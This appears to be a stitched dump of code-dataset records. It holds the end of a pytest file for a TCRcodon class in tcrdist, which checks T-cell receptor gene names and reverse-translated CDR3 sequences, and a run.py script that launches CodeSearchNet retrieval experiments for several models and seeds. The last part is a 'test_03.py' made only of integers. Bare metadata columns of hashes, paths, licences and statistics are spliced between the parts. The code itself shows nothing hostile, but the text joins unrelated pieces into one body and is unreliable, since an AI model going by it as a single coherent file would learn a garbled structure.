'TRBV6-6*05', 'TRBV6-7*01', 'TRBV6-8*01', 'TRBV6-9*01', 'TRBV7-1*01', 'TRBV7-2*01', 'TRBV7-2*02', 'TRBV7-2*03', 'TRBV7-2*04', 'TRBV7-3*01', 'TRBV7-3*02', 'TRBV7-3*03', 'TRBV7-3*04', 'TRBV7-3*05', 'TRBV7-4*01', 'TRBV7-6*01', 'TRBV7-6*02', 'TRBV7-7*01', 'TRBV7-7*02', 'TRBV7-8*01', 'TRBV7-8*02', 'TRBV7-8*03', 'TRBV7-9*01', 'TRBV7-9*02', 'TRBV7-9*03', 'TRBV7-9*04', 'TRBV7-9*05', 'TRBV7-9*06', 'TRBV7-9*07', 'TRBV9*01', 'TRBV9*02', 'TRBV9*03', 'TRBJ1-1*01', 'TRBJ1-2*01', 'TRBJ1-3*01', 'TRBJ1-4*01', 'TRBJ1-5*01', 'TRBJ1-6*01', 'TRBJ1-6*02', 'TRBJ2-1*01', 'TRBJ2-2*01', 'TRBJ2-2P*01', 'TRBJ2-3*01', 'TRBJ2-4*01', 'TRBJ2-5*01', 'TRBJ2-6*01', 'TRBJ2-7*01', 'TRBJ2-7*02', 'TRBD1*01', 'TRBD2*01', 'TRBD2*02'])
def test_TCRcodon_mouse_gd_init():
tc = TCRcodon(organism = "mouse", db_file = "gammadelta_db.tsv")
assert set(tc.all_genes.keys()) == set(['TRGV1*01', 'TRGV1*02', 'TRGV1*03', 'TRGV1*04', 'TRGV1*05', 'TRGV1*06', 'TRGV1*07', 'TRGV1*08', 'TRGV2*01', 'TRGV2*02', 'TRGV2*03', 'TRGV2*04', 'TRGV2*05', 'TRGV3*01', 'TRGV3*02', 'TRGV3*03', 'TRGV4*01', 'TRGV4*02', 'TRGV4*03', 'TRGV4*04', 'TRGV4*05', 'TRGV5*01', 'TRGV6*01', 'TRGV6*02', 'TRGV6*03', 'TRGV6*04', 'TRGV7*01', 'TRGV7*02', 'TRGJ3*01', 'TRGJ2*01', 'TRGJ1*01', 'TRGJ4*01', 'TRAV1*01', 'TRAV1*02', 'TRAV10*01', 'TRAV10*02', 'TRAV10*03', 'TRAV10*04', 'TRAV10*05', 'TRAV10D*01', 'TRAV10D*02', 'TRAV10N*01', 'TRAV11*01', 'TRAV11*02', 'TRAV11D*01', 'TRAV11N*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-1*03', 'TRAV12-1*04', 'TRAV12-1*05', 'TRAV12-2*01', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV12-3*03', 'TRAV12-3*04', 'TRAV12D-1*01', 'TRAV12D-1*02', 'TRAV12D-1*04', 'TRAV12D-1*05', 'TRAV12D-2*01', 'TRAV12D-2*02', 'TRAV12D-2*03', 'TRAV12D-2*04', 'TRAV12D-2*05', 'TRAV12D-3*01', 'TRAV12D-3*02', 'TRAV12D-3*03', 'TRAV12N-1*01', 'TRAV12N-2*01', 'TRAV12N-3*01', 'TRAV13-1*01', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV13-3*01', 'TRAV13-3*02', 'TRAV13-4/DV7*01', 'TRAV13-4/DV7*02', 'TRAV13-4/DV7*03', 'TRAV13-5*01', 'TRAV13D-1*01', 'TRAV13D-1*02', 'TRAV13D-1*03', 'TRAV13D-2*01', 'TRAV13D-2*02', 'TRAV13D-3*01', 'TRAV13D-3*02', 'TRAV13D-4*01', 'TRAV13D-4*02', 'TRAV13D-4*03', 'TRAV13N-1*01', 'TRAV13N-2*01', 'TRAV13N-3*01', 'TRAV13N-4*01', 'TRAV14-1*01', 'TRAV14-1*02', 'TRAV14-1*03', 'TRAV14-2*01', 'TRAV14-2*02', 'TRAV14-2*03', 'TRAV14-3*01', 'TRAV14-3*02', 'TRAV14-3*03', 'TRAV14D-1*01', 'TRAV14D-1*02', 'TRAV14D-2*01', 'TRAV14D-2*02', 'TRAV14D-2*03', 'TRAV14D-3/DV8*01', 'TRAV14D-3/DV8*02', 'TRAV14D-3/DV8*03', 'TRAV14D-3/DV8*04', 'TRAV14D-3/DV8*05', 'TRAV14D-3/DV8*06', 'TRAV14D-3/DV8*07', 'TRAV14D-3/DV8*08', 'TRAV14N-1*01', 'TRAV14N-2*01', 'TRAV14N-3*01', 'TRAV15-1/DV6-1*01', 'TRAV15-1/DV6-1*02', 'TRAV15-2/DV6-2*01', 'TRAV15-2/DV6-2*02', 'TRAV15D-1/DV6D-1*01', 'TRAV15D-1/DV6D-1*02', 'TRAV15D-1/DV6D-1*03', 'TRAV15D-1/DV6D-1*04', 'TRAV15D-1/DV6D-1*05', 'TRAV15D-1/DV6D-1*06', 'TRAV15D-2/DV6D-2*01', 'TRAV15D-2/DV6D-2*02', 'TRAV15D-2/DV6D-2*03', 'TRAV15D-2/DV6D-2*04', 'TRAV15D-2/DV6D-2*05', 'TRAV15N-1*01', 'TRAV15N-2*01', 'TRAV16*01', 'TRAV16*02', 'TRAV16*03', 'TRAV16*04', 'TRAV16*05', 'TRAV16D/DV11*01', 'TRAV16D/DV11*02', 'TRAV16D/DV11*03', 'TRAV16N*01', 'TRAV17*01', 'TRAV17*02', 'TRAV18*01', 'TRAV19*01', 'TRAV19*03', 'TRAV2*01', 'TRAV20*01', 'TRAV20*02', 'TRAV21/DV12*01', 'TRAV21/DV12*02', 'TRAV3-1*01', 'TRAV3-1*02', 'TRAV3-3*01', 'TRAV3-4*01', 'TRAV3D-3*01', 'TRAV3D-3*02', 'TRAV3N-3*01', 'TRAV4-2*01', 'TRAV4-2*02', 'TRAV4-3*01', 'TRAV4-3*02', 'TRAV4-4/DV10*01', 'TRAV4D-2*01', 'TRAV4D-3*01', 'TRAV4D-3*02', 'TRAV4D-3*03', 'TRAV4D-3*04', 'TRAV4D-4*01', 'TRAV4D-4*02', 'TRAV4D-4*03', 'TRAV4D-4*04', 'TRAV4N-3*01', 'TRAV4N-4*01', 'TRAV5-1*01', 'TRAV5-2*01', 'TRAV5-4*01', 'TRAV5D-2*01', 'TRAV5D-4*01', 'TRAV5D-4*02', 'TRAV5D-4*03', 'TRAV5D-4*04', 'TRAV5D-4*05', 'TRAV5N-2*01', 'TRAV5N-4*01', 'TRAV6-1*01', 'TRAV6-1*02', 'TRAV6-2*01', 'TRAV6-2*02', 'TRAV6-2*03', 'TRAV6-3*01', 'TRAV6-3*02', 'TRAV6-4*01', 'TRAV6-4*02', 'TRAV6-4*03', 'TRAV6-5*01', 'TRAV6-5*02', 'TRAV6-5*03', 'TRAV6-5*04', 'TRAV6-6*01', 'TRAV6-6*02', 'TRAV6-6*03', 'TRAV6-7/DV9*01', 'TRAV6-7/DV9*02', 'TRAV6-7/DV9*03', 'TRAV6-7/DV9*04', 'TRAV6-7/DV9*06', 'TRAV6-7/DV9*07', 'TRAV6-7/DV9*08', 'TRAV6D-3*01', 'TRAV6D-3*02', 'TRAV6D-4*01', 'TRAV6D-5*01', 'TRAV6D-6*01', 'TRAV6D-6*02', 'TRAV6D-6*03', 'TRAV6D-6*04', 'TRAV6D-6*05', 'TRAV6D-7*01', 'TRAV6D-7*02', 'TRAV6D-7*03', 'TRAV6D-7*04', 'TRAV6N-5*01', 'TRAV6N-6*01', 'TRAV6N-7*01', 'TRAV7-1*01', 'TRAV7-2*01', 'TRAV7-2*02', 'TRAV7-3*01', 'TRAV7-3*02', 'TRAV7-3*03', 'TRAV7-3*04', 'TRAV7-4*01', 'TRAV7-4*02', 'TRAV7-5*01', 'TRAV7-5*02', 'TRAV7-5*03', 'TRAV7-6*01', 'TRAV7-6*02', 'TRAV7D-2*01', 'TRAV7D-2*02', 'TRAV7D-2*03', 'TRAV7D-3*01', 'TRAV7D-3*02', 'TRAV7D-4*01', 'TRAV7D-4*02', 'TRAV7D-4*03', 'TRAV7D-5*01', 'TRAV7D-6*01', 'TRAV7D-6*02', 'TRAV7N-4*01', 'TRAV7N-5*01', 'TRAV7N-6*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-1*03', 'TRAV8-2*01', 'TRAV8D-1*01', 'TRAV8D-1*02', 'TRAV8D-2*01', 'TRAV8D-2*02', 'TRAV8D-2*03', 'TRAV8N-2*01', 'TRAV9-1*01', 'TRAV9-1*02', 'TRAV9-2*01', 'TRAV9-3*01', 'TRAV9-3*02', 'TRAV9-3*03', 'TRAV9-4*01', 'TRAV9D-1*01', 'TRAV9D-1*02', 'TRAV9D-2*01', 'TRAV9D-2*02', 'TRAV9D-2*03', 'TRAV9D-3*01', 'TRAV9D-3*02', 'TRAV9D-4*01', 'TRAV9D-4*03', 'TRAV9D-4*04', 'TRAV9N-2*01', 'TRAV9N-3*01', 'TRAV9N-4*01', 'TRDV1*01', 'TRDV2-1*01', 'TRDV2-2*01', 'TRDV2-2*02', 'TRDV4*01', 'TRDV5*01', 'TRDV5*02', 'TRDV5*03', 'TRDV5*04', 'TRDJ1*01', 'TRDJ2*01', 'TRDJ2*02', 'TRDD1*01', 'TRDD2*01'])
def test_TCRcodon_human_gd_init():
tc = TCRcodon(organism = "human", db_file = "gammadelta_db.tsv")
assert set(tc.all_genes.keys()) == set(['TRGV1*01', 'TRGV10*01', 'TRGV10*02', 'TRGV11*01', 'TRGV11*02', 'TRGV2*01', 'TRGV2*02', 'TRGV3*01', 'TRGV3*02', 'TRGV4*01', 'TRGV4*02', 'TRGV5*01', 'TRGV5P*01', 'TRGV5P*02', 'TRGV8*01', 'TRGV9*01', 'TRGV9*02', 'TRGVA*01', 'TRGJ1*01', 'TRGJ1*02', 'TRGJP1*01', 'TRGJ2*01', 'TRGJP*01', 'TRGJP2*01', 'TRAV1-1*01', 'TRAV1-1*02', 'TRAV1-2*01', 'TRAV1-2*02', 'TRAV10*01', 'TRAV11*01', 'TRAV12-1*01', 'TRAV12-1*02', 'TRAV12-2*01', 'TRAV12-2*02', 'TRAV12-2*03', 'TRAV12-3*01', 'TRAV12-3*02', 'TRAV13-1*01', 'TRAV13-1*02', 'TRAV13-1*03', 'TRAV13-2*01', 'TRAV13-2*02', 'TRAV14/DV4*01', 'TRAV14/DV4*02', 'TRAV14/DV4*03', 'TRAV14/DV4*04', 'TRAV16*01', 'TRAV17*01', 'TRAV18*01', 'TRAV19*01', 'TRAV2*01', 'TRAV2*02', 'TRAV20*01', 'TRAV20*02', 'TRAV20*03', 'TRAV20*04', 'TRAV21*01', 'TRAV21*02', 'TRAV22*01', 'TRAV23/DV6*01', 'TRAV23/DV6*02', 'TRAV23/DV6*03', 'TRAV23/DV6*04', 'TRAV24*01', 'TRAV24*02', 'TRAV25*01', 'TRAV26-1*01', 'TRAV26-1*02', 'TRAV26-1*03', 'TRAV26-2*01', 'TRAV26-2*02', 'TRAV27*01', 'TRAV27*02', 'TRAV27*03', 'TRAV29/DV5*01', 'TRAV29/DV5*02', 'TRAV3*01', 'TRAV30*01', 'TRAV30*02', 'TRAV30*03', 'TRAV30*04', 'TRAV34*01', 'TRAV35*01', 'TRAV35*02', 'TRAV36/DV7*01', 'TRAV36/DV7*02', 'TRAV36/DV7*03', 'TRAV36/DV7*04', 'TRAV38-1*01', 'TRAV38-1*02', 'TRAV38-1*03', 'TRAV38-1*04', 'TRAV38-2/DV8*01', 'TRAV39*01', 'TRAV4*01', 'TRAV40*01', 'TRAV41*01', 'TRAV5*01', 'TRAV6*01', 'TRAV6*02', 'TRAV6*03', 'TRAV6*04', 'TRAV6*05', 'TRAV6*06', 'TRAV7*01', 'TRAV8-1*01', 'TRAV8-1*02', 'TRAV8-2*01', 'TRAV8-2*02', 'TRAV8-3*01', 'TRAV8-3*02', 'TRAV8-3*03', 'TRAV8-4*01', 'TRAV8-4*02', 'TRAV8-4*03', 'TRAV8-4*04', 'TRAV8-4*05', 'TRAV8-4*06', 'TRAV8-4*07', 'TRAV8-6*01', 'TRAV8-6*02', 'TRAV8-7*01', 'TRAV9-1*01', 'TRAV9-2*01', 'TRAV9-2*02', 'TRAV9-2*03', 'TRAV9-2*04', 'TRDV1*01', 'TRDV2*01', 'TRDV2*02', 'TRDV2*03', 'TRDV3*01', 'TRDV3*02', 'TRDJ1*01', 'TRDJ4*01', 'TRDJ3*01', 'TRDJ2*01', 'TRDD1*01', 'TRDD3*01', 'TRDD2*01'])
def test_TCRcodon_single_example():
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
r = tc.guess_reverse_translation(v_gene_name= 'TRBV29*01' , j_gene_name= 'TRBJ1-5*01' , cdr3_aa = 'CASSEGEAPLF')
assert r == 'TGTGCTAGCAGTGAGGGAGAGGCTCCGCTTTTT'
def test_TCRcodon_single_example2():
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
r = tc.guess_reverse_translation(v_gene_name= 'TRBV29*01' , \
j_gene_name= 'TRBJ2-2*01' , cdr3_aa = 'CASSPTGQLYF')
# Only the edges are gauranteed to match the real seq shown below, as insertion codons a
# unkown and degenerate
assert r[0:10] == 'tgtgctagcagccccaccgggcagctctacttt'.upper()[0:10]
assert r[-10:-1] == 'tgtgctagcagccccaccgggcagctctacttt'.upper()[-10:-1]
assert r == 'TGTGCTAGCAGTCCTACCGGGCAGCTCTACTTT'
def test_TCRcodon_small_dataframe_beta():
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
df = clone_df_subset[['v_b_gene','j_b_gene', 'cdr3_b_aa','cdr3_b_nucseq']]
syn_nucs = df.apply(lambda r: \
tc.guess_reverse_translation(r['v_b_gene'], r['j_b_gene'], r['cdr3_b_aa'], verbose = False), axis = 1)
len_syn = [len(x) for x in syn_nucs]
len_real =[len(x) for x in df['cdr3_b_nucseq']]
assert np.all(len_syn == len_real)
def test_TCRcodon_small_dataframe_alpha():
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
df = clone_df_subset[['v_a_gene','j_a_gene', 'cdr3_a_aa','cdr3_a_nucseq']]
syn_nucs = df.apply(lambda r: \
tc.guess_reverse_translation(r['v_a_gene'], r['j_a_gene'], r['cdr3_a_aa'], verbose = False), axis = 1)
# Check that synthestic and real seqs are same length
len_syn = [len(x) for x in syn_nucs]
len_real =[len(x) for x in df['cdr3_a_nucseq']]
assert np.all(len_syn == len_real)
def test_TCRcodon_smal_dataframe_alpha_beta_lots():
"""Bigger Example """
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
df = pd.read_csv("tcrdist/test_files_compact/dash.csv")
syn_nucs = df.apply(lambda r: \
tc.guess_reverse_translation( \
r['v_b_gene'], r['j_b_gene'], r['cdr3_b_aa'],\
verbose = False), axis = 1)
len_syn = [len(x) for x in syn_nucs]
len_real =[len(x) for x in df['cdr3_b_nucseq']]
assert np.all(len_syn == len_real)
syn_nucs = df.apply(lambda r: \
tc.guess_reverse_translation(\
r['v_a_gene'], r['j_a_gene'], r['cdr3_a_aa'],\
verbose = False), axis = 1)
# Check that synthestic and real seqs are same length
len_syn = [len(x) for x in syn_nucs]
len_real =[len(x) for x in df['cdr3_a_nucseq']]
assert np.all(len_syn == len_real)
def test_TCRcodon_smal_dataframe_delta_lots():
tc = TCRcodon(organism = "human", db_file = "gammadelta_db.tsv")
df = pd.read_csv("tcrdist/test_files_compact/sant.csv")
# Sant data Doesn't provide J gene so we are handicapped in that regard, for testing we just guess on
df['j_g_gene'] = 'TRGJ1*01'
syn_nucs = df.apply(lambda r: \
tc.guess_reverse_translation(\
r['v_g_gene'], r['j_g_gene'], r['cdr3_g_aa'],\
verbose = False), axis = 1)
# Check that synthestic and real seqs are same length
len_syn = [len(x) for x in syn_nucs]
len_real =[3*len(x) for x in df['cdr3_g_aa']]
assert np.all(len_syn == len_real)
def test_TCRcodon_smal_dataframe_gama_lots():
tc = TCRcodon(organism = "human", db_file = "gammadelta_db.tsv")
df = pd.read_csv("tcrdist/test_files_compact/sant.csv")
df['j_d_gene'] = [tc.get_best_j_gene(aa_seq = x, verbose = False) for x in df['cdr3_d_aa']]
df = df[df['v_d_gene'].notna()].copy()
syn_nucs = df.apply(lambda r: \
tc.guess_reverse_translation(\
r['v_d_gene'], r['j_d_gene'], r['cdr3_d_aa'],\
verbose = False), axis = 1)
# Check that synthestic and real seqs are same length
len_syn = [len(x) for x in syn_nucs]
len_real =[3*len(x) for x in df['cdr3_d_aa']]
assert np.all(len_syn == len_real)
assert np.all(len_syn == len_real)
def test_get_bets_j_gene():
from tcrdist.pairwise import hm_metric
tc = TCRcodon(organism = "human", db_file = "gammadelta_db.tsv")
df = pd.read_csv("tcrdist/test_files_compact/sant.csv")
someseq = df['cdr3_d_aa'][1]
x = tc.get_best_j_gene(aa_seq = someseq, verbose = True)
assert x == 'TRDJ1*01'
# test for all
xx = [tc.get_best_j_gene(aa_seq = x, verbose = False) for x in df['cdr3_d_aa']]
vc = pd.Series(xx).value_counts().to_dict()
assert vc == {'TRDJ1*01': 271, 'TRDJ3*01': 66, 'TRDJ2*01': 20, 'TRDJ4*01': 9}
def test_get_bets_j_gene_room_for_improvement():
tc = TCRcodon(organism = "mouse", db_file = "alphabeta_db.tsv")
df = clone_df_subset[['v_b_gene','j_b_gene', 'cdr3_b_aa','cdr3_b_nucseq']]
xx = [tc.get_best_j_gene(aa_seq = x, verbose = False) for x in df['cdr3_b_aa']]
# THIS CAN'T RESOLVE TIES, OR WHO KNOW WHAT ELSE
assert np.all(df['j_b_gene'][0:2] == xx[0:2])
assert np.sum(df['j_b_gene'] == xx) > 20
| 179.538462
| 5,837
| 0.603599
| 4,147
| 23,340
| 3.328912
| 0.089462
| 0.018472
| 0.012749
| 0.0113
| 0.740311
| 0.734806
| 0.725534
| 0.70996
| 0.698805
| 0.688446
| 0
| 0.247139
| 0.123822
| 23,340
| 130
| 5,838
| 179.538462
| 0.427922
| 0.021165
| 0
| 0.465347
| 0
| 0
| 0.580738
| 0.011913
| 0
| 0
| 0
| 0
| 0.188119
| 1
| 0.128713
| false
| 0
| 0.059406
| 0
| 0.188119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
66c588cb21d38fc905a076a58aa4f5d7d12b897c
| 2,280
|
py
|
Python
|
data/run.py
|
bentrevett/pytorch-for-code
|
1dd35e4b80eba8b1eae687d4f9c4a1c4d8122d0a
|
[
"MIT"
] | 9
|
2020-01-20T12:59:45.000Z
|
2021-03-05T02:46:44.000Z
|
data/run.py
|
bentrevett/pytorch-for-code
|
1dd35e4b80eba8b1eae687d4f9c4a1c4d8122d0a
|
[
"MIT"
] | null | null | null |
data/run.py
|
bentrevett/pytorch-for-code
|
1dd35e4b80eba8b1eae687d4f9c4a1c4d8122d0a
|
[
"MIT"
] | null | null | null |
import subprocess
"""command = 'python get_codesearchnet.py'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""print('processing data...')
command = 'python process_codesearchnet.py'
process = subprocess.Popen(command, shell=True)
process.wait()
print('making vocabs...')
languages = ['go', 'java', 'javascript', 'php', 'python', 'ruby', '6L']
for language in languages:
command = f'python get_vocab.py --data codesearchnet/{language}_train.jsonl'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = 'python bpe.py --data codesearchnet/java --vocab_max_size 10000 --bpe_pct 0.5 --language java'
process = subprocess.Popen(command, shell=True)
process.wait()
command = 'python bpe.py --data codesearchnet/6L --vocab_max_size 10000 --bpe_pct 0.5 --language 6L'
process = subprocess.Popen(command, shell=True)
process.wait()"""
for seed in [1,2,3,4,5]:
train_data = 'data/codesearchnet/java_train_bpe_10000_0.5.jsonl'
valid_data = 'data/codesearchnet/java_valid_bpe_10000_0.5.jsonl'
test_data = 'data/codesearchnet/java_test_bpe_10000_0.5.jsonl'
code_vocab = 'data/codesearchnet/java-bpe-10000-0.5_code_vocab.jsonl'
desc_vocab = 'data/codesearchnet/java-bpe-10000-0.5_desc_vocab.jsonl'
for model in ['nbow', 'rnn', 'cnn', 'transformer']:
command = f'python code_retrieval_{model}.py --train_data {train_data} --valid_data {valid_data} --test_data {test_data} --code_vocab {code_vocab} --desc_vocab {desc_vocab} --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
train_data = 'data/codesearchnet/6L_train_bpe_10000_0.5.jsonl'
valid_data = 'data/codesearchnet/6L_valid_bpe_10000_0.5.jsonl'
test_data = 'data/codesearchnet/6L_test_bpe_10000_0.5.jsonl'
code_vocab = 'data/codesearchnet/6L-bpe-10000-0.5_code_vocab.jsonl'
desc_vocab = 'data/codesearchnet/6L-bpe-10000-0.5_desc_vocab.jsonl'
for model in ['nbow', 'rnn', 'cnn', 'transformer']:
command = f'python code_retrieval_{model}.py --train_data {train_data} --valid_data {valid_data} --test_data {test_data} --code_vocab {code_vocab} --desc_vocab {desc_vocab} --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
| 42.222222
| 195
| 0.721053
| 325
| 2,280
| 4.824615
| 0.163077
| 0.140944
| 0.057398
| 0.063776
| 0.811862
| 0.811862
| 0.811862
| 0.811862
| 0.772959
| 0.730867
| 0
| 0.048842
| 0.128947
| 2,280
| 54
| 196
| 42.222222
| 0.740685
| 0
| 0
| 0.4
| 0
| 0.1
| 0.628006
| 0.387553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
66e2ddc96706895503d4aef34a89030b2db9ddfc
| 29,210
|
py
|
Python
|
assignments/task_02/test_cases/test_03.py
|
Rlperez1207/stem
|
1bdfb63bc7b9b28ca505cc4b71c3a70937613658
|
[
"MIT"
] | null | null | null |
assignments/task_02/test_cases/test_03.py
|
Rlperez1207/stem
|
1bdfb63bc7b9b28ca505cc4b71c3a70937613658
|
[
"MIT"
] | null | null | null |
assignments/task_02/test_cases/test_03.py
|
Rlperez1207/stem
|
1bdfb63bc7b9b28ca505cc4b71c3a70937613658
|
[
"MIT"
] | null | null | null |
99
52
88
70
6
92
10
17
68
26
8
76
89
7
66
2
36
77
99
94
64
93
97
47
88
4
93
67
82
15
29
28
89
11
93
81
30
8
34
14
54
22
42
26
13
59
4
39
82
71
40
96
92
72
19
2
28
75
27
42
61
43
28
20
80
62
35
78
71
7
25
52
94
96
23
16
56
73
99
18
87
43
79
20
11
96
85
77
53
73
13
13
35
16
43
1
36
81
17
100
7
92
10
68
61
2
54
1
71
43
98
12
4
72
35
64
88
46
28
70
70
16
8
35
10
96
88
37
17
4
66
34
25
15
24
16
88
63
75
49
51
51
48
71
36
58
1
16
31
27
16
53
78
68
11
41
38
65
79
18
87
97
28
14
46
19
46
24
99
94
43
9
70
89
59
10
81
50
48
61
35
9
31
35
78
3
57
10
92
77
51
8
35
88
31
3
22
34
7
97
14
93
1
92
21
9
36
20
51
68
70
72
49
49
7
95
14
38
11
24
55
95
53
40
36
15
13
40
99
98
81
9
27
58
5
74
84
80
85
44
100
22
6
53
79
36
99
61
67
46
16
26
78
65
22
89
49
15
94
25
26
3
86
82
8
70
60
6
56
47
79
96
75
54
12
89
74
28
53
38
77
31
47
21
62
57
47
63
71
78
53
73
40
77
25
22
14
100
10
95
40
30
22
88
34
5
68
82
81
71
64
43
56
15
24
65
94
92
59
7
59
39
29
95
98
96
20
52
47
23
13
57
20
77
71
66
45
79
50
91
81
87
26
11
54
76
36
42
18
73
2
44
69
54
16
5
97
82
17
5
40
74
63
13
37
48
44
31
34
44
38
36
84
36
51
57
65
36
7
7
46
81
46
39
49
78
36
89
95
11
29
32
37
20
88
62
93
63
79
88
97
78
60
29
30
4
49
98
86
9
67
16
81
96
86
10
76
34
24
67
88
24
17
72
16
41
28
79
98
67
78
87
15
13
84
8
38
89
67
25
80
47
66
54
87
47
26
55
96
57
30
23
56
58
25
85
16
98
69
27
30
92
6
2
56
2
12
84
2
62
7
65
71
49
68
25
96
70
44
43
60
63
20
40
87
11
32
20
5
6
15
27
9
75
44
27
92
38
41
10
4
8
61
86
33
59
26
58
6
71
54
89
47
43
60
26
88
69
73
73
82
14
13
87
84
29
37
48
46
62
52
46
29
59
44
54
94
40
74
94
15
82
44
38
2
78
63
65
86
69
51
39
28
78
76
17
26
10
14
48
77
36
66
65
18
45
42
7
87
76
39
94
76
44
72
77
94
87
38
54
64
82
53
94
53
96
77
90
88
43
36
67
56
34
3
89
99
61
74
98
15
47
79
35
81
53
44
4
1
26
54
25
64
62
53
25
68
99
70
69
39
63
81
42
26
100
75
92
24
18
48
7
37
41
98
35
30
77
82
22
94
40
86
73
11
91
48
95
38
52
48
51
73
11
48
76
21
48
15
30
35
28
11
21
94
21
72
91
32
86
62
9
40
79
44
78
76
35
52
96
84
69
38
13
85
77
11
88
34
93
84
47
86
16
93
67
22
37
27
97
97
64
93
52
74
1
41
45
43
34
93
13
57
88
35
35
35
16
8
90
74
8
66
96
43
36
47
84
3
11
59
90
40
84
96
54
95
67
86
10
97
25
63
68
92
72
71
6
57
88
94
90
52
29
54
10
76
34
19
59
5
23
49
33
83
64
72
33
87
37
75
43
71
64
94
94
74
90
13
95
60
43
100
59
100
9
57
63
61
48
65
21
13
63
38
79
54
95
32
39
70
96
64
88
97
17
71
29
6
74
9
65
35
39
42
34
84
59
35
86
52
83
76
43
17
84
50
3
29
86
5
75
55
39
92
33
58
52
35
56
90
69
52
99
7
61
18
19
92
85
72
39
10
75
31
51
45
21
29
53
65
9
47
25
70
81
48
43
43
21
24
56
24
25
18
15
53
86
4
7
66
46
30
91
72
88
11
36
39
62
92
62
18
89
98
56
76
82
60
18
47
59
85
32
68
65
68
61
19
36
96
92
57
7
44
99
91
72
76
47
95
37
90
89
88
29
45
71
80
67
96
24
98
69
3
60
10
67
62
77
96
82
10
46
97
89
8
95
75
54
97
74
49
76
59
6
79
81
57
27
64
79
66
33
3
56
92
89
56
27
35
44
92
49
92
23
29
96
18
38
39
35
93
42
69
74
57
59
74
36
62
79
21
99
93
7
92
6
59
15
87
27
62
64
72
95
41
35
29
55
1
45
39
88
85
87
33
42
49
17
85
92
30
59
44
86
45
30
98
4
48
57
37
82
6
77
64
52
84
73
37
93
48
35
12
25
1
76
49
86
4
52
9
29
14
28
65
75
37
51
48
10
100
96
12
24
26
43
8
75
26
70
32
79
16
25
81
18
79
89
39
44
70
94
5
97
53
51
84
18
58
48
11
63
75
48
29
36
97
11
38
33
3
74
61
3
36
48
13
36
26
80
46
65
16
69
96
33
93
15
82
46
73
64
18
69
69
71
2
57
60
15
40
71
56
34
86
85
52
29
75
49
28
60
9
87
42
62
67
9
1
96
48
99
63
33
24
34
3
40
84
91
66
36
63
20
91
17
71
83
85
97
85
18
84
46
63
40
51
45
46
59
48
35
75
75
100
24
67
67
43
94
53
35
93
78
58
23
74
52
53
57
86
26
74
89
19
92
82
46
93
98
34
6
57
81
93
26
50
19
36
28
5
40
26
10
15
30
68
9
15
4
30
97
81
70
37
5
73
29
72
19
23
91
1
22
71
16
8
41
56
46
9
87
14
12
44
100
54
99
96
61
98
87
94
63
64
16
52
87
52
9
45
28
47
56
83
63
35
80
19
15
1
88
16
38
6
89
86
88
13
25
90
68
56
16
6
2
9
95
22
31
68
62
35
61
93
58
64
5
34
16
20
52
24
3
97
5
52
42
11
82
32
34
68
35
16
52
54
95
1
15
81
30
49
72
48
50
28
17
31
27
33
87
40
11
58
14
69
29
73
74
84
74
63
70
53
48
75
70
19
82
3
87
5
41
61
53
68
42
93
3
88
3
49
52
66
34
8
91
81
24
45
91
61
81
12
68
12
49
62
57
83
99
62
49
60
74
2
1
90
87
77
32
46
5
29
20
6
71
43
62
78
22
91
34
77
86
15
66
74
40
80
29
7
54
32
54
85
91
48
53
4
20
22
63
15
64
35
78
86
88
45
46
55
41
24
14
54
59
2
47
86
17
35
86
54
35
25
85
24
2
34
90
98
32
75
3
68
42
34
20
49
9
49
67
78
1
73
26
25
60
18
13
26
72
68
18
23
42
35
85
83
9
15
54
49
99
93
51
23
16
94
17
20
80
37
11
42
22
37
35
22
18
26
28
9
52
71
48
45
21
67
37
96
14
75
7
16
40
37
26
92
66
60
64
10
90
84
54
86
80
82
92
57
82
78
17
52
2
42
32
5
44
50
39
57
91
49
70
52
13
88
68
29
42
29
1
43
88
63
84
55
10
32
87
85
89
13
55
22
97
41
76
90
41
61
23
4
85
36
56
67
90
33
19
19
24
56
83
97
13
54
84
97
33
20
27
2
48
53
5
93
82
63
76
13
21
25
8
65
46
83
41
11
96
91
76
11
30
2
75
36
3
27
16
78
52
68
58
42
38
50
9
79
24
10
96
45
63
84
56
64
15
27
75
20
6
7
38
50
32
31
39
8
33
94
77
97
97
77
37
6
3
11
64
16
57
63
74
69
78
4
6
33
47
1
56
87
12
45
34
33
97
28
9
11
95
53
43
45
23
53
70
69
29
36
10
65
31
81
5
81
70
55
23
77
15
64
59
92
54
23
1
38
19
90
47
61
98
46
28
81
54
43
53
38
77
11
67
9
58
92
77
14
54
58
66
39
42
50
60
58
99
87
39
32
63
41
20
94
40
34
94
8
47
1
34
76
43
12
99
98
81
90
91
50
21
7
65
24
80
14
20
28
50
44
32
8
93
99
31
10
17
25
5
30
73
95
87
79
38
34
1
57
7
19
28
79
23
4
48
47
99
66
41
90
80
72
53
58
57
82
68
58
1
28
68
56
56
76
27
88
18
94
24
38
84
36
76
29
54
67
46
40
91
78
59
58
34
28
69
4
63
15
79
100
88
32
75
93
16
14
74
2
98
99
36
19
21
52
11
8
60
83
